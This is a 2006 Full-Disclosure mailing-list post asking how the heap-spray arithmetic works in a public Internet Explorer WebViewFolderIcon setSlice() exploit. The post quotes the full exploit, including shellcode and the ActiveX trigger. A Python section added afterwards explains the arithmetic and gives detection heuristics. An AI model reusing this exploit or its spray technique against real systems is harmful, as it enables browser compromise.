Full Disclosure: Regarding the heap spray.

Regarding the heap spray.

From: . Solo <soloaway_at_gmail.com>
Date: Mon, 20 Nov 2006 18:16:56 +0800

Hi all,

I was testing an old exploit -- Internet Explorer WebViewFolderIcon
setSlice() Exploit http://www.milw0rm.com/exploits/2448 -- and there are
some places I do not really understand:

*Question inline.....*

<!--

..::[ jamikazu presents ]::..

Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2

Author: jamikazu
Mail: jamikazu_at_gmail.com

Bug discovered by Computer H D Moore (http://www.metasploit.com)

Credit: metasploit, SkyLined

invokes calc.exe if successful

-->

<HTML>
<BODY>
<SCRIPT language="javascript">

var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000; <===== Why is
heapBlockSize set to 0x400000, the base address of IE?
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
<===== spraySlideSize is used to control the size of the spray; why is it
computed as "heapBlockSize - (payLoadSize+0x38)"?

var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
<== heapBlocks is the number used to fill the memory; why is it computed
as "(heapSprayToAddress - 0x400000)/heapBlockSize"?

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

   for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</SCRIPT>

</BODY>
</HTML>

///////////////////////////////////////////////////////

*I am not quite sure whether I have described my question clearly. Thanks for
your help.*

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Nov 20 2006
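The arithmetic the poster asks about, and a triage check for scripts of this shape, as an added example that is not part of the original post or the exploit. It takes the 0x38 string overhead and the 0x400000 base from the post; `SAMPLE_JS` is a constructed skeleton with a dummy payload instead of the shellcode, and the regex heuristics are the editor's own, not anything from the exploit or a real scanner.

```python
import math
import re

# Constructed sample: the skeleton of the posted spray with a dummy payload
# (the real shellcode is omitted; only the structure matters for triage).
SAMPLE_JS = '''
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%u4141%u4242%u4343");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; }
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + payLoadCode; }
'''

HEX32 = re.compile(r'0x([0-9A-Fa-f]{8})\b')
UNESCAPED = re.compile(r'unescape\(\s*"((?:%u[0-9A-Fa-f]{4})+)"\s*\)')
DOUBLING = re.compile(r'(\w+)\s*\+=\s*\1\s*;')

def spray_layout(target, block_size, payload_bytes, overhead=0x38, base=0x400000):
    """Mirror the post's arithmetic. Each block is slide + payload + 0x38 bytes
    of string overhead, so it fills exactly block_size bytes. heapBlocks is a
    float in JavaScript (about 19.07 here) and 'i < heapBlocks' runs ceil() times."""
    slide_bytes = block_size - (payload_bytes + overhead)
    blocks = math.ceil((target - base) / block_size)
    end = base + blocks * block_size   # assumes the blocks land contiguously from base
    return {"slide_bytes": slide_bytes, "blocks": blocks,
            "covers_target": base <= target < end}

def heap_spray_indicators(js):
    """Triage heuristics tied to this script's shape: a constant wide-char
    slide whose repeated 16-bit unit spells a 32-bit literal used elsewhere,
    plus a self-doubling string loop. Returns the indicators found."""
    literals = {int(h, 16) for h in HEX32.findall(js)}
    found = []
    for s in UNESCAPED.findall(js):
        units = set(re.findall(r'%u([0-9A-Fa-f]{4})', s))
        if len(units) == 1:                       # one unit repeated: a slide, not shellcode
            u = int(units.pop(), 16)
            if ((u << 16) | u) in literals:
                found.append("slide_matches_address:0x%08x" % ((u << 16) | u))
    if DOUBLING.search(js):
        found.append("string_doubling_loop")
    return found
```

With 19 blocks the sprayed range would end at 0x5000000, short of 0x05050505; the fractional JavaScript loop bound is what makes the 20th block allocate, so the `ceil()` is deliberate.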
